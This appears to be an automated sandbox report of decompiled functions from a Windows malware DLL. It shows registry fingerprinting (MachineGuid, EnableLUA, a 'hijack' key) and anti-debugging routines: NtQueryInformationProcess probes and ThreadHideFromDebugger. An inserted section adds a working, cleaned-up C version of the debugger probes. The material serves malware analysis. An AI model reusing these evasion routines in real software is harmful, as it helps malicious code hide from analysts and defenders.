                                                                                                                                                				E1001A2F0( &_v276,  &_v12);
                                                                                                                                                				E1000CD96( &_v276,  &_v276, 0x104, "hijack");
                                                                                                                                                				_v8 = E1001A480(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
                                                                                                                                                				_t20 = E1000CC93(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
                                                                                                                                                				_t38 = _v8;
                                                                                                                                                				if(_v8 != 0) {
                                                                                                                                                					_push(_v8);
                                                                                                                                                					return E1000CA30(__ebx, _t28, __esi, _t38);
                                                                                                                                                				}
                                                                                                                                                				return _t20;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                  • Part of subcall function 1001A2F0: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                • _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                  • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                  • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                  • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                • _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                  • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                  • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
                                                                                                                                                • String ID: SOFTWARE\Microsoft\%s$hijack
                                                                                                                                                • API String ID: 3138967372-3622423033
                                                                                                                                                • Opcode ID: ada38b5ab26f5dc62f486429ffaac0b96da48a560580f8f5e3c1f71cb78a86e2
                                                                                                                                                • Instruction ID: 9399b5cfcd873c48396239d23a26fdd32b2e9067639008cfe42ca2b6aed02eb6
                                                                                                                                                • Opcode Fuzzy Hash: ada38b5ab26f5dc62f486429ffaac0b96da48a560580f8f5e3c1f71cb78a86e2
                                                                                                                                                • Instruction Fuzzy Hash: 7D0152FAC0020CA7DB15D7A0EC47FE97378DB58304F0404A9E61856141F6B5A7C8CB92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001D240() {
                                                                                                                                                				void* _v8;
                                                                                                                                                				int _v12;
                                                                                                                                                				signed int _v16;
                                                                                                                                                				int _v20;
                                                                                                                                                				char _v24;
                                                                                                                                                
                                                                                                                                                				_v12 = 4;
                                                                                                                                                				_v20 = 4;
                                                                                                                                                				_v16 = 0;
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				_v24 = 0;
                                                                                                                                                				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0x20019,  &_v8) == 0) {
                                                                                                                                                					if(RegQueryValueExW(_v8, L"EnableLUA", 0,  &_v12,  &_v24,  &_v20) == 0) {
                                                                                                                                                						_v16 = 0 | _v24 == 0x00000001;
                                                                                                                                                					}
                                                                                                                                                					RegCloseKey(_v8);
                                                                                                                                                				}
                                                                                                                                                				return _v16;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                Strings
                                                                                                                                                • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 1001D274
                                                                                                                                                • EnableLUA, xrefs: 1001D296
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
                                                                                                                                                • API String ID: 3677997916-2194944742
                                                                                                                                                • Opcode ID: 266f08e0f126cb4b8deb597b18c5a4e6f0f9f98ecfb3ee9ea26cd0a9d97fb6d8
                                                                                                                                                • Instruction ID: 5282c0b80e2e5c01901b155bdceaa9b4f75acfd53aa6edd49772c4382101ddc9
                                                                                                                                                • Opcode Fuzzy Hash: 266f08e0f126cb4b8deb597b18c5a4e6f0f9f98ecfb3ee9ea26cd0a9d97fb6d8
                                                                                                                                                • Instruction Fuzzy Hash: EC01FFB5D00219FBEB04DFD1CD98BEEBBB8EB44305F108059E611BA280D7B59B04CB61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001A2F0(char* _a4, int* _a8) {
                                                                                                                                                				void* _v8;
                                                                                                                                                				int* _v12;
                                                                                                                                                
                                                                                                                                                				_v12 = 0;
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8) == 0) {
                                                                                                                                                					if(RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8) == 0) {
                                                                                                                                                						_v12 = 1;
                                                                                                                                                					}
                                                                                                                                                					RegCloseKey(_v8);
                                                                                                                                                					return _v12;
                                                                                                                                                				}
                                                                                                                                                				return 0;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A33C
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 1001A355
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                • String ID: MachineGuid$Software\Microsoft\Cryptography
                                                                                                                                                • API String ID: 3677997916-880526231
                                                                                                                                                • Opcode ID: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                • Instruction ID: 9e24c58cdf23cf18939fbcaabd435f76492adcd0c706e8d6ab3c4d486606bf24
                                                                                                                                                • Opcode Fuzzy Hash: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                • Instruction Fuzzy Hash: 71F0F474600208FBEB10DFA4CC85F9D77B8EB04745F608044FA15AA180D775DB819765
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 60%
                                                                                                                                                			E10013389(void* __ebx, void* __esi) {
                                                                                                                                                				void* _t1;
                                                                                                                                                				long _t5;
                                                                                                                                                				void* _t9;
                                                                                                                                                				void* _t11;
                                                                                                                                                				void* _t15;
                                                                                                                                                
                                                                                                                                                				_t9 = __ebx;
                                                                                                                                                				_t1 = TlsGetValue( *0x10332c6c);            // 0x10332c6c holds a TLS index owned by the CRT (0x1f in this dump)
                                                                                                                                                				_t16 = _t1;
                                                                                                                                                				if(_t1 != 0) {                              // a block is stored in the slot for this thread
                                                                                                                                                					_push( *0x10332c68);
                                                                                                                                                					_t11 =  *(TlsGetValue( *0x10332c6c))();
                                                                                                                                                				}
                                                                                                                                                				_pop(_t15);
                                                                                                                                                				_push(0);
                                                                                                                                                				_push( *0x10332c68);
                                                                                                                                                				 *((intOrPtr*)(E10013034( *0x10333820)))();  // __decode_pointer: unwraps an encoded function pointer before calling through it
                                                                                                                                                				_push(_t11);
                                                                                                                                                				L10013256(_t9, _t11, _t15, _t16);           // cleanup helper, receives the value fetched from the TLS slot
                                                                                                                                                				_t5 =  *0x10332c6c; // 0x1f
                                                                                                                                                				if(_t5 != 0xffffffff) {                     // 0xffffffff is TLS_OUT_OF_INDEXES: the slot was never allocated
                                                                                                                                                					return TlsSetValue(_t5, 0);             // clear the slot so the released block is not reused
                                                                                                                                                				}
                                                                                                                                                				return _t5;
                                                                                                                                                			}









                                                                                                                                                APIs
                                                                                                                                                • TlsGetValue.KERNEL32 ref: 10013396
                                                                                                                                                • TlsGetValue.KERNEL32 ref: 100133A8
                                                                                                                                                • __decode_pointer.LIBCMT ref: 100133BD
                                                                                                                                                • TlsSetValue.KERNEL32(0000001F,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330250,0000000C,1000EBE7), ref: 100133D9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Value$__decode_pointer
                                                                                                                                                • String ID: tj
                                                                                                                                                • API String ID: 3389472636-3491506833
                                                                                                                                                • Opcode ID: 98b685037422a500dab51c28cbe3472850961789b495b2f1d75dbfea88fe638a
                                                                                                                                                • Instruction ID: a5e655cd75536ae3ffa2bd70bd2a424c71ddb38a18ae7223bb1ec647065a0f02
                                                                                                                                                • Opcode Fuzzy Hash: 98b685037422a500dab51c28cbe3472850961789b495b2f1d75dbfea88fe638a
                                                                                                                                                • Instruction Fuzzy Hash: CDE06D31500120AEDA12A768DCC4B5D3FAAFB84260F249111F418DE1B1CF31DE96DA54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                			E10019F00() {
                                                                                                                                                				char _v8;
                                                                                                                                                				_Unknown_base(*)()* _v12;
                                                                                                                                                				struct HINSTANCE__* _v16;
                                                                                                                                                
                                                                                                                                                				_v8 = 1;                                    // pre-set to 1: if the query fails, the function reports "not debugged"
                                                                                                                                                				_v16 = LoadLibraryA("Ntdll.dll");           // ntdll is already mapped in every process; this only adds a reference
                                                                                                                                                				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                				_v12(GetCurrentProcess(), 0x1f,  &_v8, 4, 0); // 0x1f = ProcessDebugFlags (NoDebugInherit); the NTSTATUS is discarded
                                                                                                                                                				return 0 | _v8 != 0x00000001;               // the flag reads 0 while a debugger is attached, so nonzero means "debugged"
                                                                                                                                                			}







                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F12
                                                                                                                                                • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F24
                                                                                                                                                • GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F37
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                • API String ID: 353374858-801751246
                                                                                                                                                • Opcode ID: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                • Instruction ID: 96ba2470dd98e020bf0cfbce012c3df4c205278cc2531598ec11657ea2300d3b
                                                                                                                                                • Opcode Fuzzy Hash: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                • Instruction Fuzzy Hash: F5F03075D00208FFEB00DFE0CC8DADCBB74EB04301F508094FA01A6140D6745A48CB61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                			E10019F50() {
                                                                                                                                                				char _v8;
                                                                                                                                                				_Unknown_base(*)()* _v12;
                                                                                                                                                				struct HINSTANCE__* _v16;
                                                                                                                                                
                                                                                                                                                				_v8 = 0;                                    // receives the debug-object handle (4 bytes in this 32-bit module)
                                                                                                                                                				_v16 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                				_v12(GetCurrentProcess(), 0x1e,  &_v8, 4, 0); // 0x1e = ProcessDebugObjectHandle; fails with STATUS_PORT_NOT_SET when no debugger is attached
                                                                                                                                                				return 0 | _v8 != 0x00000000;               // nonzero handle means "debugged"; the handle is never closed
                                                                                                                                                			}







                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F62
                                                                                                                                                • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F74
                                                                                                                                                • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019F87
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                • API String ID: 353374858-801751246
                                                                                                                                                • Opcode ID: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                • Instruction ID: 4290971ec9e7b3841b7fe9691c0d5d42a9a3d927b1d111e6c5789e877817e371
                                                                                                                                                • Opcode Fuzzy Hash: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                • Instruction Fuzzy Hash: 7FF0A575900218FBEB00EBE0DD89BDDBBB8EB04705F618498EA01A6280DA745A49DB65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                			E10019FA0() {
                                                                                                                                                				char _v8;
                                                                                                                                                				_Unknown_base(*)()* _v12;
                                                                                                                                                				struct HINSTANCE__* _v16;
                                                                                                                                                
                                                                                                                                                				_v8 = 0;                                    // receives the debug port value (pointer-sized; 4 bytes on x86)
                                                                                                                                                				_v16 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                				_v12(GetCurrentProcess(), 7,  &_v8, 4, 0);    // 7 = ProcessDebugPort; the kernel writes -1 when a debug port is attached
                                                                                                                                                				return 0 | _v8 != 0x00000000;               // nonzero port means "debugged"; the NTSTATUS is discarded
                                                                                                                                                			}
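The three functions E10019F00, E10019F50 and E10019FA0 differ only in the information class they hand to NtQueryInformationProcess: 0x1f (ProcessDebugFlags), 0x1e (ProcessDebugObjectHandle) and 7 (ProcessDebugPort). Each one discards the returned NTSTATUS, passes a 4-byte buffer regardless of process bitness, and the 0x1e variant leaks the debug-object handle it receives. The C below is an added example, not code from the sample or from this report: it performs the same three probes with the status and size handling the sample omits, takes the query routine as a parameter so the decision logic can be exercised against a constructed fake off Windows, and resolves the real export only under _WIN32. The names debugger_checks, debugger_checks_live, run_fake, fake_query and the QIP_* constants are this example's own; the fake's answers are constructed test data, not observed behaviour of the sample.

```c
/* Added example, not code from the sample or the report: the three NtQueryInformationProcess
 * anti-debug probes seen in E10019F00/E10019F50/E10019FA0, with status and size handling.
 * The query routine is a parameter so the logic runs against a constructed fake off Windows. */
#include <stddef.h>
#include <stdint.h>

#ifdef _WIN32
#include <windows.h>
#include <winternl.h>                 /* NTSTATUS, NTAPI */
#else                                 /* stand-in types so the logic compiles off Windows */
#define NTAPI
typedef int32_t NTSTATUS;
typedef uint32_t ULONG;
typedef void *HANDLE;
#endif

#ifndef STATUS_SUCCESS
#define STATUS_SUCCESS ((NTSTATUS)0x00000000)
#endif
#define STATUS_INFO_LENGTH_MISMATCH_ ((NTSTATUS)0xC0000004)
#define STATUS_PORT_NOT_SET_         ((NTSTATUS)0xC0000353)

/* PROCESSINFOCLASS values the sample uses: ProcessDebugPort, ProcessDebugObjectHandle,
 * ProcessDebugFlags. Prefixed so they cannot clash with winternl.h's partial enum. */
enum { QIP_DebugPort = 7, QIP_DebugObjectHandle = 0x1e, QIP_DebugFlags = 0x1f };

typedef NTSTATUS (NTAPI *NtQIP_t)(HANDLE, ULONG, void *, ULONG, ULONG *);

#define DBG_PORT   1                  /* one bit per probe that fired */
#define DBG_OBJECT 2
#define DBG_FLAGS  4

/* Runs the three probes through `query`; `release` (may be NULL) closes the debug-object
 * handle the kernel hands back. Returns a DBG_* bitmask. */
int debugger_checks(NtQIP_t query, HANDLE self, void (*release)(HANDLE))
{
    int hits = 0;
    ULONG ret = 0;
    NTSTATUS st;

    /* ProcessDebugPort is pointer-sized and reads -1 while a debug port is attached. The
     * sample's 4-byte buffer is only correct for a 32-bit process. */
    uintptr_t port = 0;
    st = query(self, QIP_DebugPort, &port, sizeof port, &ret);
    if (st == STATUS_SUCCESS && port != 0)
        hits |= DBG_PORT;

    /* ProcessDebugObjectHandle fails with STATUS_PORT_NOT_SET when nothing is attached;
     * otherwise the caller owns a real handle, which the sample never closes. */
    HANDLE dbg = NULL;
    st = query(self, QIP_DebugObjectHandle, &dbg, sizeof dbg, &ret);
    if (st == STATUS_SUCCESS && dbg != NULL) {
        hits |= DBG_OBJECT;
        if (release)
            release(dbg);
    }

    /* ProcessDebugFlags returns the NoDebugInherit flag, 0 while debugged. The sample pre-sets
     * its buffer to 1 and ignores the status, so a failed call silently reads as "clean". */
    ULONG flags = 1;
    st = query(self, QIP_DebugFlags, &flags, sizeof flags, &ret);
    if (st == STATUS_SUCCESS && flags == 0)
        hits |= DBG_FLAGS;

    return hits;
}

#ifdef _WIN32
static void close_h(HANDLE h) { CloseHandle(h); }

/* Live variant: ntdll is always mapped, so GetModuleHandle is enough (the sample's
 * LoadLibraryA("Ntdll.dll") only adds a reference). Returns -1 if the export is missing. */
int debugger_checks_live(void)
{
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    NtQIP_t q = ntdll ? (NtQIP_t)GetProcAddress(ntdll, "NtQueryInformationProcess") : NULL;
    return q ? debugger_checks(q, GetCurrentProcess(), close_h) : -1;
}
#endif

/* Constructed fake of the kernel's answers for a clean (0) or debugged (1) process.
 * Test data only, not observed behaviour of the sample. */
static int g_fake_debugged = 0;

static NTSTATUS NTAPI fake_query(HANDLE h, ULONG cls, void *buf, ULONG len, ULONG *ret)
{
    (void)h;
    if (ret) *ret = len;
    switch (cls) {
    case QIP_DebugPort:
        if (len < sizeof(uintptr_t)) return STATUS_INFO_LENGTH_MISMATCH_;
        *(uintptr_t *)buf = g_fake_debugged ? (uintptr_t)-1 : 0;
        return STATUS_SUCCESS;
    case QIP_DebugObjectHandle:
        if (len < sizeof(HANDLE)) return STATUS_INFO_LENGTH_MISMATCH_;
        if (!g_fake_debugged) return STATUS_PORT_NOT_SET_;
        *(HANDLE *)buf = (HANDLE)(uintptr_t)0x1234;   /* dummy value, never dereferenced */
        return STATUS_SUCCESS;
    case QIP_DebugFlags:
        if (len < sizeof(ULONG)) return STATUS_INFO_LENGTH_MISMATCH_;
        *(ULONG *)buf = g_fake_debugged ? 0 : 1;
        return STATUS_SUCCESS;
    default:
        return (NTSTATUS)0xC0000003;                  /* STATUS_INVALID_INFO_CLASS */
    }
}

/* Drives the probes against the fake: 0 for a clean process, 7 (all three bits) when debugged. */
int run_fake(int debugged)
{
    g_fake_debugged = debugged;
    return debugger_checks(fake_query, NULL, NULL);
}
```

On a Windows machine with a debugger attached, debugger_checks_live() returns 7 unless something rewrites the kernel's answers, which is exactly what anti-anti-debug plugins do by hooking NtQueryInformationProcess and faking these three classes; when stepping through the sample, expect all three probes to fire unless such a hook is in place. Note also the asymmetry in the sample's own code: because E10019F00 initialises its buffer to 1, any failure of the 0x1f query makes that check pass silently, while the 0x1e and 7 variants fail closed only because their buffers start at 0.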







APIs
• LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FB2
• GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FC4
• GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 10019FD7
Strings
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: AddressCurrentLibraryLoadProcProcess
• String ID: NtQueryInformationProcess$Ntdll.dll
• API String ID: 353374858-801751246
• Opcode ID: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
• Instruction ID: a091bf084543d9cc22bc0e3cc688341cf2a1c1168494879eaf10af3ffd9ffb2e
• Opcode Fuzzy Hash: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
• Instruction Fuzzy Hash: EEF0C075D44208FFEB00DFE0DD4DB9DBBB8EB04301F518494FA05A6180D7745A49CB65
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%
			E10019D40() {
				_Unknown_base(*)()* _v8;
				struct HINSTANCE__* _v12;

				_v12 = LoadLibraryA("Ntdll.dll");
				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
				// Information class 0x11 is ThreadHideFromDebugger: the calling thread stops reporting debug events to an attached debugger
				return _v8(GetCurrentThread(), 0x11, 0, 0);
			}


APIs
• LoadLibraryA.KERNEL32(Ntdll.dll,?,100206A1), ref: 10019D4B
• GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019D5D
• GetCurrentThread.KERNEL32 ref: 10019D6C
Strings
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: AddressCurrentLibraryLoadProcThread
• String ID: Ntdll.dll$ZwSetInformationThread
• API String ID: 903204110-1680533912
• Opcode ID: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
• Instruction ID: 29caf765b55be7bf21a38254d48f72174c1d944e91014696290b2e85dee50fc2
• Opcode Fuzzy Hash: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
• Instruction Fuzzy Hash: 5CE0EC74940208FBFF00EBE0AD8DB9CBB78FB04702F618095FE01A6280DAB059058AB5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
			E1001F4A0(void* _a4, char* _a8) {
				char* _v8;
				struct _FILETIME _v12;
				void* _v16;
				struct _SYSTEMTIME _v32;
				char* _v40;
				char* _v44;
				struct _FILETIME _v52;
				char* _t43;

				_v44 = 0;
				_v40 = 0;
				_v16 = 0;
				// 0x101 = KEY_QUERY_VALUE | KEY_WOW64_64KEY; opens subkey _a8 under root key _a4
				if(RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16) == 0) {
					// The final argument receives the key's last-write time as a FILETIME
					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						// 0x7b2 = 1970: build the Unix epoch (1970-01-01 00:00:00) as a FILETIME in _v52
						_v32.wYear = 0x7b2;
						_v32.wMonth = 1;
						_v32.wDay = 1;
						_v32.wHour = 0;
						_v32.wMinute = 0;
						_v32.wSecond = 0;
						_v32.wMilliseconds = 0;
						SystemTimeToFileTime( &_v32,  &_v52);
						_t43 = _v8;
						asm("sbb edx, [ebp-0x2c]");
						// 64-bit (last write - epoch) / 0x2710 (10000), E1000F290 being __aulldiv:
						// converts 100 ns FILETIME units to milliseconds since the Unix epoch
						_v44 = E1000F290(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
						_v40 = _t43;
					}
					RegCloseKey(_v16);
				}
				return _v44;
			}


APIs
• RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00000101,00000000), ref: 1001F4CE
• RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F4F8
• SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F534
• __aulldiv.LIBCMT ref: 1001F54F
• RegCloseKey.ADVAPI32(00000000), ref: 1001F55E
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
• String ID:
• API String ID: 3147484438-0
• Opcode ID: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
• Instruction ID: 6ac3f46dae9d66049611ff428ba7790207c0dca18eda03b4da7369df6ee0e458
• Opcode Fuzzy Hash: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
